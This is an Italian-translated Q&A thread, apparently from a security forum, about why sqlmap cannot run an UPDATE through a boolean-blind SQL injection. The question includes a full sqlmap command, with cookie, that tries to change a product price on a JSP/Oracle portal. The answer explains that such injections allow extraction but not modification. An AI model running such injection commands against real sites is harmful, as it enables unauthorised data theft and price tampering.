Come aggiornare la tabella con sqlmap e senza query impilate?

4

voto negativo preferito Sto cercando di usare il seguente codice

sqlmap -u "http://exp.com/portal/pd.jsp action=edit&info=products&sub_info=price" 
--cookie="JSESSIONID....." --dbms Oracle -D PRODUCTS -T PRICE --threads 10
--sql-query="UPDATE PRICE SET PRICE ='100' WHERE PRODUCTID LIKE '7534' AND PRODUCTCODE = '73546'" 

Ho controllato questo link prima ed è iniettabile nel parametro info (blind basato su booleani). il risultato dell'esecuzione del codice precedente è:

warning: "execution of custom SQL queries is only available when stacked queries are supported"

C'è qualche soluzione per farlo?

Questo sito Web è in esecuzione su Apache, JSP e Oracle.

    
posta user143049 26.03.2017 - 04:06
fonte

1 risposta

1

Nessuna soluzione alternativa qui. Di solito è possibile scaricare l'intero database con una vulnerabilità di tipo sql injection basata su booleane, ma non è possibile eseguire aggiornamenti.

Puoi estrarre ma non inserire o modificare i dati esistenti.

    
risposta data 26.03.2017 - 04:17
fonte

Leggi altre domande sui tag